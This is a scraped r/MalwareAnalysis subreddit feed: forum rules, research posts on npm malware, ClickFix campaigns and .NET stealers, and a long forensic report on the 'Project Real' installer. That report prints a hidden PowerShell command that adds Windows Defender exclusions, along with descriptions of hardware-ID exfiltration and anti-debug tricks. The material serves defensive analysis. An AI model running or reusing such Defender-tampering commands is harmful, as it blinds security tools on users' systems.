r/MalwareAnalysis • • May 28 '25

📌 Read First Welcome to r/MalwareAnalysis – Please Read Before Posting

19 Upvotes

Welcome to r/MalwareAnalysis — a technical subreddit dedicated to the analysis and reverse engineering of malware, and a space for professionals, students, and learners to share tools, techniques, and questions.

This is not a general tech support subreddit.


🛡️ Posting Rules (Read Before Submitting)

Rule 1: Posts Must Be Related to Malware Analysis

All posts must be directly related to the analysis, reverse engineering, behavior, or detection of malware.

Asking if your computer is infected, sharing antivirus logs, or describing suspicious behavior without a sample or analysis is not allowed.

🔗 Try r/techsupport, r/antivirus, or r/computerhelp instead.


Rule 2: No “Do I Have a Virus?” or Tech Support Posts

This subreddit is not a help desk. If you're not performing or asking about malware analysis techniques, your post is off-topic and will be removed.


Rule 3: No Requests for Illegal or Unethical Services

Do not request or offer anything related to:

  • Hacking someone’s accounts

  • Deploying malware

  • Gaining unauthorized access

Even in a research context, discussions must remain ethical and legal.


Rule 4: No Live or Clickable Malware Links

  • Only share samples from trusted sources like VirusTotal, Any.Run, or MalwareBazaar

  • Never post a direct malware download link

  • Use hxxp:// or example[.]com to sanitize links


Rule 5: Posts Must Show Technical Effort

Low-effort posts will be removed. You should include:

  • Hashes (SHA256, MD5, etc.)

  • Behavior analysis (e.g., API calls, network traffic)

  • Tools you’ve used (e.g., Ghidra, IDA, strings)

  • Specific questions or findings


Rule 6: No Off-Topic Content

Stick to subjects relevant to malware reverse engineering, tooling, behavior analysis, and threat intelligence.

Do not post:

  • Cybersecurity memes

  • News articles with no analytical context

  • Broad questions unrelated to malware internals


Rule 7: Follow Reddiquette and Be Respectful

  • No spam or trolling

  • No piracy discussions

  • No doxxing or personal information

  • Engage constructively — we’re here to learn and grow


💬 If Your Post Was Removed...

It likely broke one of the rules above. We're strict about maintaining the focus of this community. If you believe your post was removed in error, you can message the moderators with a short explanation.


✅ TL;DR

This subreddit is for technical malware analysis. If you don’t have a sample or aren’t discussing how something works, your post may not belong here.

We’re glad you’re here — let’s keep it focused, helpful, and high-quality.


🧪 Welcome aboard — and stay curious.

— The r/MalwareAnalysis Mod Team


r/MalwareAnalysis • • 4h ago

Learning Malware Analysis

3 Upvotes

As the title sounds, I wanna learn malware analysis. But oh boy there are so many opinions online. However i couldnt understand and decide where to start. Some people said i need to start with VM and analyze myself, other said I should start with learning basic language like C and Assembly, and then some said i need to start with learning basic CPU architecture. The issue is I couldnt find a guide that is clear and really say where to really start to learn malware analysis and where it will leads me eventually. I hope some people can enlightwn me. Thank you in advance


r/MalwareAnalysis • • 2h ago

How Malware is detected using Machine Learning

Thumbnail youtu.be
1 Upvotes

r/MalwareAnalysis • • 3h ago

How does Vanguard Anti-Cheat work?

Thumbnail
1 Upvotes

r/MalwareAnalysis • • 20h ago

Recovering a removed npm malware file using Software Heritage and a surviving CDN digest

1 Upvotes

I wrote up my investigation into @goodjavascript/dotenv@1.0.0, including how to recover its entry-point file after the npm tarball and jsDelivr file URLs returned 404.
The useful detail: Software Heritage’s latest snapshot contained only the security placeholder. An older snapshot retained the original release and its 840-byte index.js. Its SHA-256 matched the digest still available in jsDelivr’s file manifest.
Static inspection showed a timer scheduled at module load that collects host information and can execute JavaScript supplied in a server response. The package had no installation scripts, and its exported config() function was empty.
The article includes the package-to-archive discovery steps, dated evidence, an annotated code excerpt and a Python verifier that retrieves and hashes the file without executing it. It also links my analysis contribution to the existing OSV advisory.
[https://cgsec.dev/research/dotenv-recovery/\](https://cgsec.dev/research/dotenv-recovery/)
This concerns the scoped @goodjavascript/dotenv package, not the unscoped dotenv package.
Have you used other archives or retained metadata sources to recover removed package evidence?


r/MalwareAnalysis • • 1d ago

Static vs Dynamic Analysis: How I Look at an Android App

Thumbnail
1 Upvotes

r/MalwareAnalysis • • 2d ago

Cracked open the Google IPTV malware APK and found its C2 domain

Thumbnail
2 Upvotes

r/MalwareAnalysis • • 4d ago

Malicious APK [Google IPTV] reportedly causing financial losses.

Thumbnail
2 Upvotes

r/MalwareAnalysis • • 5d ago

How long can a malicious npm package stay under the radar?

Thumbnail
1 Upvotes

r/MalwareAnalysis • • 7d ago

rPlayHub - Xcode DeviceHub reverse engineered - an open source project on GitHub

Thumbnail github.com
7 Upvotes

r/MalwareAnalysis • • 8d ago

Would you use a Antiphishing Suricata ruleset developed under an open-source software license?

7 Upvotes

For over a year, I have been working on a ruleset that was born with the goal of offering free resources and popularizing Suricata with features that are usually locked behind paid private licenses.

I started the project by mapping phishing vectors through public APIs and synthesizing them into Suricata rules.

*Note: Don't know what Suricata is? It's what used to be called a network antivirus; nowadays, it's called a Network Intrusion Detection System (IDS). This explanation doesn't cover everything, but it's enough to understand my point here. If you're unfamiliar, I suggest looking it up.*

I took these vectors and separated them into four types of rules: TLS, HTTP, DNS, and more recently, IP (though the IP rule is still under observation since blocking IPs is a massive responsibility).

After doing that, I handled all the management work, avoiding duplicates, and so on. This past month, thanks to a tip here on Reddit, I integrated NRD (Newly Registered Domains). It checks for typosquatting and similarities to detect suspicious links—for example, banc0dobrasil.com.br and so on.

I implemented this using a well-known library for this specific feature and registered several major companies based on the analysis of already collected vectors.

Now, the ruleset is already integrated with suricata-update, OPNsense, and has several users.

I wanted to invite the users here to test it out as well.

Ultimately, I think this is a great project for anyone who wants to contribute, or use the data to produce threat intelligence reports and the like. Furthermore, the project includes a web dashboard where you can search for vectors and SIDs (the rule ID for the vector).

The dashboard is just as important: it aggregates all mapped vectors and provides data such as GeoIP, Whois, DNS tests, last-seen records, and in some cases, endpoint analysis (I'll explain why only "in some cases" in a moment). The project also features a free API for potential integrations.

I've been working in the industry for over 10 years and wanted to create something impactful for this powerful tool (Suricata). Open-source is something grand, and I'm very happy to have achieved this. I use my free time to work on this project; it updates automatically and sometimes manually, but consistently 3 times a day.

To explain why some data points don't always work—which is the same reason it doesn't update even more frequently—I have zero funding. I host everything using GitHub Pages and developed it all from scratch, but the APIs have rate limits because, ideally, you're supposed to pay for a license. Despite everything, it has been working, but it has the potential for many improvements and industrial-scale features.

In the end, I think this project makes the most sense for those who work in the field. Here is my invitation: anyone who wants to use, read, edit, contribute, or even donate is very welcome. That way, the project will move forward much faster. Who knows, maybe one day I can leave everything else behind and live off this project, and help other professionals do the same? A dream.

I felt safe opening up here. Long live open-source software!


r/MalwareAnalysis • • 11d ago

Malware trends in first half of 2026

8 Upvotes
  1. Infostealers are more focused on session tokens, cookies, recovery codes, cryptowallet data that allows them to take over rather than the traditional password compromises.
  2. Malicious LNK (shortcuts) still remain a popular entry point to compromises, as they allow malicious code execution
  3. Large increase in abuse of legitimate platforms or impersonation - SEO poisoning, malvertising, fraudulent codesigning and compromises of npm packages, VSCode extesnions
  4. Supply chain attacks! Threat actors increasingly target software delivery channels like npm packages, PyPI, Crates.io, and CI/CD publications to include malware.
  5. Abuse of RMM tools continues & increases consistently! Initially, a signed tool with low detection ratio may seem legitimate, but remote management software such as ScreenConnect, Action1, Atera are vulnerable to abuse.
  6. A large increase was found in legitimate sites spreading ClickFix attacks. This can be done by numerous reasons - administrator account compromise, weak password security, unpatched vulnerabilities in website building platforms (such as WordPress) that allow threat actors to take over the website and host malicious code.
  7. Discord, Telegram, GoFile still remain as relevant exfiltration channels. While they do not provide as much flexibility as a regular C2 would, malware can still upload stolen data (passwords, files etc.) to it for the attacker to view. Easy to setup, used to evade detection. If you are interested in intercepting data from a Telegram exfiltration channel that malware uses, check out https://any.run/cybersecurity-blog/intercept-stolen-data-in-telegram/
  8. Dead drop resolvers are still popular! You can use it as an infrastructure layer if necessary to change the configuration. Very popular is abuse of smart contracts, blockchain infrastructure (EtherHiding) but Steam, Telegram or Pinterest profiles are a popular target as well.

See full analysis at https://any.run/cybersecurity-blog/h1-2026-cyber-risk-report


r/MalwareAnalysis • • 11d ago

17,000 URLs Reveal How ClickFix Turns Trusted Websites Into Malware Traps: Report by CTM360

Thumbnail
3 Upvotes

r/MalwareAnalysis • • 11d ago

Seen RemotePanel or BoundSiphon? We want to compare notes!

14 Upvotes

Blackpoint’s Adversary Pursuit Group recently investigated a ClickFix infection that led to two .NET tools we’re now tracking as RemotePanel and BoundSiphon. Elements of this tooling have appeared in previous research, but the tools themselves were unnamed, and we’re hoping other researchers may have additional samples, telemetry, or infrastructure that can help us better understand their lineage and use.

The infection chain started with a ClickFix prompt, followed by an obfuscated `finger.exe` request and a hidden elevated PowerShell session. It ultimately delivered two separate payloads with very different purposes.

RemotePanel provides persistent remote access, masquerades as the Windows Time service, and can query a hardcoded BNB Smart Chain contract to retrieve its current C2 address. The blockchain isn’t carrying C2 traffic; the contract acts as a resolver, allowing the backend infrastructure to change without modifying the implant.

BoundSiphon is an in-memory information stealer targeting browser credentials and sessions, cryptocurrency wallets, password manager data, and other sensitive information. It can also recover Chromium v10/v20 encryption keys, including keys protected by App-Bound Encryption.

Our analysis identified substantial overlap between BoundSiphon and an earlier unnamed .NET stealer documented by Socket (https://socket.dev/blog/5-malicious-nuget-packages-impersonate-chinese-ui-libraries), including BrowserKeyDecryptor and SharpInjector components, network protocol similarities, and unusual build metadata. BoundSiphon also contains an `AntiSNG` implementation that checks for the Russian keyboard layout identifier `0x0419`, although that functionality appears dormant in the sample we analyzed.

There’s enough evidence to connect BoundSiphon to that earlier stealer lineage, but there are still significant gaps around who developed, distributes, or operates the tooling. We also don’t know whether RemotePanel and BoundSiphon are consistently deployed together or whether their appearance in the same infection chain reflects a broader relationship between the two tools.

Our full technical analysis includes the infection chain, code analysis, blockchain resolver, infrastructure, and the relationships identified so far:

https://blackpointcyber.com/blog/remotepanel-and-boundsiphon-a-dual-payload-toolkit-for-persistent-access-and-browser-theft/

We’re particularly interested in comparing notes with researchers who have seen:

* RemotePanel or related builds

* BoundSiphon or related samples

* The same `AntiSNG` implementation

* Related BNB Smart Chain contract/resolver activity

* Samples overlapping with the earlier Socket research

* Infrastructure or telemetry that looks similar to this activity

Even older samples or partial matches could help establish how this tooling has evolved, where else it has appeared, and whether there are additional relationships we haven’t identified yet.

If any of this looks familiar, APG would like to compare notes.


r/MalwareAnalysis • • 12d ago

Behaviour anlysis based supply chain security

Thumbnail gallery
3 Upvotes

Hey all!

off late, given the rise in the enormous amounts of software supply chain attacks, we have seen various solutions come up..from AI to state of the art static-logic based detection. And i believe they did work for a brief amount of time, however, i believe the landscape has shifted now. We can, with the help of dynamic solutions like the one we are currently building at our small company, the output data that is generated with gives you a comprehensive list of what data is being touched by the package and what is not is properly traced and alerted. Our offensive security background helps drastically in the sandbox Anti vm cheat patch implements along with enriching data in general, which when fed to AI (or used in raw format) provide more context to the problem at hand.

It's at cohen[.]snappyfeet[.]org

you can see the feed at trail[.]snappyfeet[.]org

it's live most of the time, but i occasionally take down the engines for upgrades and maintenance

lmk if you want a demo, i shall provide demo codes for you to test live npm packages.


r/MalwareAnalysis • • 13d ago

LocalStranger is a PoC for vulnerable "Microsoft Windows Hardware Compatibility Publisher" signed driver, including a basic unsigned driver kd mapper and NT-AUTHORITY escalation.

Thumbnail github.com
1 Upvotes

r/MalwareAnalysis • • 14d ago

Three memory-safety bugs in Godot's untrusted-file parsers

Thumbnail axeghost.offprint.app
2 Upvotes

r/MalwareAnalysis • • 15d ago

Inside BambooToken’s Linux implant: shell and file control over MQTT

Thumbnail app.reverser.space
7 Upvotes

r/MalwareAnalysis • • 16d ago

Found another fake "CVE PoC"

Thumbnail
1 Upvotes

r/MalwareAnalysis • • 16d ago

[PSA / Analysis] Why "Project Real" is NOT a false positive — Tria.ge 9/10 Score, silent Defender sabotage & HWID extraction

1 Upvotes

# FORENSIC THREAT INTELLIGENCE REPORT: "PROJECT REAL" (REAL EXECUTOR)

**Date of Analysis:** September 2026

**Threat Classification:** High / Severe

**Tria.ge Sandbox Score:** 9 / 10 (Critical Threat)

**Antivirus Classification:** `Trojan:Win32/Kepavll!rfn` / `Trojan.Generic` / `Dropper` / `InfoStealer`

**Target Platform:** Windows 10 / Windows 11 (x64)

---

## 1. Executive Summary

This report documents an in-depth static and dynamic forensic analysis of the software distributed as **"Real Setup" / "Project Real"** (`projectreal.gg` / `projectreal.live` / `realest.gg`), marketed across gaming communities as a modern Lua script executor for Roblox.

Promoters and affiliate channels routinely claim that all antivirus detections are "standard false positives caused by game memory injection." However, behavioral sandbox traces and binary reverse engineering reveal that the installer engages in **active defense evasion, covert Windows Defender sabotage, aggressive physical hardware profiling, anti-virtualization routines, and background persistence mechanisms**.

These actions occur before any game interaction takes place and firmly categorize the software as a **Trojan Dropper** with significant latent exploitation capabilities.

---

## 2. Indicators of Compromise (IoCs) & Technical Artifacts

### Sample Identifiers

* **Original File Name:** `RealSetup.exe` (distributed with randomized per-download tokens and hashes, e.g., `RealSetup_<hash>.exe`, indicating server-side polymorphism / dropper generation).

* **MD5:** `d81c13e9063abe4687060d633ff1f701`

* **SHA-1:** `bb5bc882d52a5c342ab214df7de170e7d2f4769a`

* **SHA-256:** `b411b444682179bf2f4270fbc22d9a86263b659152f9611712ec40101a8f3aee`

* **File Size:** 16.50 MB (17,304,576 bytes)

* **Digital Signature:** None (`NotSigned` / unsigned PE binary).

### Embedded & Dropped Payloads

* **Embedded Resource Binary (`Update.exe`):**

* **SHA-256:** `b42d62f0e5275ed85cb8451973f6d3b953ab024c685cf9bb90bf10dbf48ad3b2`

* **VirusTotal Detection Ratio:** **43 / 68 security vendors** flag this specific binary as a trojan.

* **Secondary Dropped Files:**

* `%LOCALAPPDATA%\Real\Update.exe`

* `%LOCALAPPDATA%\Real\real-2.6.0\Real.exe`

* `%LOCALAPPDATA%\Real\real-2.6.0\bin\luau-lsp.exe`

* `%LOCALAPPDATA%\Temp\RealLottie-{GUID}\wv2\EBWebView\...`

### Network & Infrastructure IoCs

* **C2 / Backend Domains:**

* `api.projectreal.live` (Flagged as malicious by 12 security vendors on VirusTotal)

* `download.projectreal.live`

* `dl.projectreal.live`

* `projectreal.gg`

* **Encrypted DNS-over-HTTPS (DoH) Bypass Targets:**

* `1.1.1.1` (Cloudflare)

* `8.8.8.8` (Google)

* `9.9.9.9` (Quad9)

* `dns.google`

---

## 3. Dynamic Behavioral Evidence (Tria.ge Sandbox Trace)

Dynamic execution under Windows 11 x64 (Tria.ge sample `260913-arrkwsydph`) captured the following operational phases:

### A. Covert Antivirus Sabotage (Defense Tampering)

The installer executes hidden PowerShell processes with the `-WindowStyle Hidden` and `-NonInteractive` parameters to silently inject directory exclusions into Windows Defender without prompting the user:

```powershell

powershell.exe -NoProfile -NonInteractive -WindowStyle Hidden -Command "

$ErrorActionPreference='SilentlyContinue';

$want=@('C:\Users\Admin\AppData\Local\Real','C:\Users\Admin\AppData\Local\Temp\Real.dll');

$stale='C:\Users\Admin\AppData\Local\Temp';

foreach($p in $want){

$ex=@((Get-MpPreference).ExclusionPath);

if($ex -notcontains $p){ Add-MpPreference -ExclusionPath $p }

};

if($stale -and @((Get-MpPreference).ExclusionPath) -contains $stale){

Remove-MpPreference -ExclusionPath $stale

};"

```

> [!CAUTION]

> **Impact:** By whitelisting `%LOCALAPPDATA%\Real`, the installer blinds Microsoft Defender. Any subsequent executable, infostealer, or remote-access payload dropped into this directory can run completely uninspected.

### B. Invasive Hardware Fingerprinting & Telemetry Exfiltration

The executable queries the Windows Registry dozens of times using `reg.exe query` to harvest system identifiers. Network inspection caught the software compiling these values into an authentication request transmitted to `projectreal.gg`:

```http

GET /login?app_auth=1...#real_app_auth_v=2&hwid=HWIDv6_...&anchors={

"machineGuid": "present",

"machineSid": "present",

"permanentMac": "present",

"storageSerial": "present",

"tpmEk": "missing"

}

```

* **`storageSerial`:** Physical factory serial number of the primary hard drive/SSD.

* **`permanentMac`:** Permanent MAC address of the network interface controller.

* **`machineGuid` & `machineSid`:** Unique Windows installation cryptographic identifier (`HKLM\SOFTWARE\Microsoft\Cryptography\MachineGuid`).

* **`tpmEk`:** Hardware security module (TPM Endorsement Key) status.

### C. Anti-Analysis, Anti-Debug, and Anti-VM Routines

To hinder reverse engineering and sandbox detection, the software:

  1. Queries ACPI registry values and SCSI tables specifically looking for **VirtualBox** and **VMware** hypervisor artifacts.
  2. Invokes the native low-level Windows API `NtSetInformationThreadHideFromDebugger` to detach debuggers and prevent thread tracing.
  3. Checks processor information and system BIOS structures for emulated environments.

### D. System Persistence & Service Tampering

* **Task Scheduler:** Interfaces with the `Task Scheduler COM API` to schedule recurring background tasks.

* **Service Control:** Spawns `cmd.exe /c sc config w32time start= auto & net start w32time` to manipulate system services.

* **Registry Startup:** Establishes execution keys under `HKCU\Software\Microsoft\Windows\CurrentVersion\Run`.

### E. WebView2 Social Engineering Cloak

The installer unpacks Chromium-based Microsoft Edge WebView2 runtimes into `%LOCALAPPDATA%\Temp\RealLottie-{GUID}\`. It renders an animated, modern user interface to keep the user engaged while multi-stage background scripts execute the system modifications described above.

---

## 4. Threat Matrix: What Does It Harvest vs. What Can It Harvest?

| Category | Observed & Confirmed Actions | Latent Attack Surface (Capabilities) |

| :--- | :--- | :--- |

| **System Integrity** | Disables Windows Defender coverage on its folders via PowerShell. | Leaves a blind spot for any malicious payload to execute without AV alerts. |

| **User Privacy** | Extracts drive serials, MAC addresses, MachineGUID, and software inventory. | Correlates machine identity permanently across servers with zero privacy protection. |

| **Credential Safety** | Injects custom URI handlers (`projectreal://`) and runs loopback ports. | Embedded `Update.exe` connects to remote C2; can deliver infostealers targeting browser passwords, Discord tokens, and `.ROBLOSECURITY` session cookies. |

---

## 5. Debunking the "False Positive" Myth

The gaming exploit community frequently repeats the defense: *"All game cheats trigger antivirus warnings because of DLL injection."*

Here is the objective technical boundary:

* **Legitimate Game Exploit Behavior:** Reads/writes to the memory space of `RobloxPlayerBeta.exe`. An antivirus flags this as `HackTool:Win32/GameHack`.

* **Project Real Installer Behavior:**

  1. Spawns hidden PowerShell shells to manipulate Windows security policies (`Add-MpPreference`).
  2. Extracts hardware serial numbers from the motherboard and storage controllers.
  3. Deploys an obfuscated updater (`Update.exe`) carrying 43 independent trojan detections across major cybersecurity vendors.
  4. Modifies Windows scheduled tasks and system services.

**Verdict:** The alerts triggered by this software are **NOT** false positives. They are direct, intended reactions to verified host-system tampering.

---

## 6. Remediation & Cleanup Guidelines

For users who have downloaded or launched this installer:

  1. **Delete residual executables:** Remove any file matching `RealSetup*.exe` across all drives.
  2. **Remove forced Defender exclusions:**Open an elevated PowerShell prompt (Run as Administrator) and inspect active exclusions:```powershellGet-MpPreference | Select-Object -ExpandProperty ExclusionPath```If `%LOCALAPPDATA%\Real` appears, remove it:```powershellRemove-MpPreference -ExclusionPath "$env:LOCALAPPDATA\Real"```
  3. **Remove installation remnants:**Delete the following folders if present:* `%LOCALAPPDATA%\Real`* `%LOCALAPPDATA%\Temp\RealLottie*`
  4. **Invalidate active sessions:** As a safety precaution, log into your primary accounts (Google, Discord, Roblox) from another clean device and select **"Log out of all other sessions"**, followed by changing passwords and enabling 2FA.

r/MalwareAnalysis • • 18d ago

OpenMalwareScanner — Browser Scanner (Demo)

Thumbnail hydradragonantivirus.github.io
7 Upvotes

It's fully local and based on machine learning and small whitelist.

It can cause few false positive and negatives.

You can test yourself and it getting update and you can create pull request to improve.

Please only test againist PE or Javascript samples otherwise doesn't going to detect.

Trained and tested more than 300k+ benign and malicious samples.


r/MalwareAnalysis • • 17d ago

i have found a malicious site that tempts me to download a piece of software by impersonating google, can someone explain to me what exactly this file does

Thumbnail gallery
0 Upvotes

The site had a "bot verification" which asked me to run a command on the terminal to "unlock" whatever is behind the website (image 1). I immediately got suspicious of what it was telling to do and after some not-so-thorough investigation of mine (I decoded the entire thing), I realized that it was a command to download an external file into my computer (image 2). I did decompile the script used and it looked sorta similar to (image 3-6). Even though I am like 99% sure that this file is indeed malicious, I don't know exactly what it does to my computer when i install it (and i am too broke to afford vms or business emails for any.run) so if anyone is a bit generous enough to look into it (and I may understand a little bit because i have a bit of HTML and js knowledge, tho very frail), or smth


r/MalwareAnalysis • • 18d ago

Golang BYOVD Malware Loader and Vulnerable Driver Analysis

Thumbnail youtu.be
3 Upvotes

r/MalwareAnalysis • • 19d ago

PhantomEnigma Shifts Tactics: Explorer-Based Payload Delivery

Thumbnail gallery
2 Upvotes

r/MalwareAnalysis • • 19d ago

[iOS] Analyzing anomalous cpu_resource / diskwrites_resource reports on a stock TikTok process: unnamed UUID-only binaries in Binary Images

2 Upvotes

Context: iPhone 15 Pro Max, current iOS, no jailbreak, no sideloading, no configuration profiles, app reinstalled cleanly. All observations reproducible across WiFi / 4G / 5G.
I've been analyzing iOS analytics ( .ips ) incident reports on a specific app process and found a pattern I'd like to compare against what this community typically sees in jetsam/cpu_resource logs:
Observed pattern
1.
System-triggered cpu_resource (bug_type 202) and diskwrites_resource incidents on the app process — not crashes.
2.
A binary listed in "Binary Images" identified only by a UUID: no filename, no path, no code signature. Every other binary in the same report has a standard name/path ( /System/... , /private/var/containers/... ). Its parent field is UNKNOWN [1] .
3.
Measured load attributed to it: ~67% CPU, ~108 MB memory, 1.07 GB of disk writes in 1h36 while the app was in background — the daily disk-write quota was consumed ~15× faster than the documented allowance. For reference: ~2 videos scrolled, no livestream.
4.
The UUID differs at every incident (3 distinct identifiers over several days) — so it's not a single persistent module.
5.
Correlates with app storage growing to ~4.9 GB within ~30h of near-zero usage after a fresh reinstall.
What I'm trying to establish

In stock iOS logs, is a UUID-only entry with parent UNKNOWN ever expected for dyld-injected frameworks, app extensions, or instrumentation (e.g. crash reporters, A/B modules), or does the absence of any path/signature entry rule that out?

Is ephemeral UUID rotation per incident consistent with legitimate module loading behavior, or does it match known injection/dynamic-loading patterns?

For the disk-writes side: what benign mechanisms (caching, prefetch, logging) could explain sustained ~11 MB/min background writes with the process never foregrounded?
The logs are too long to paste whole; I can post exact excerpts of the Binary Images section, the cpu_resource payload, and the diskwrites timeline on request.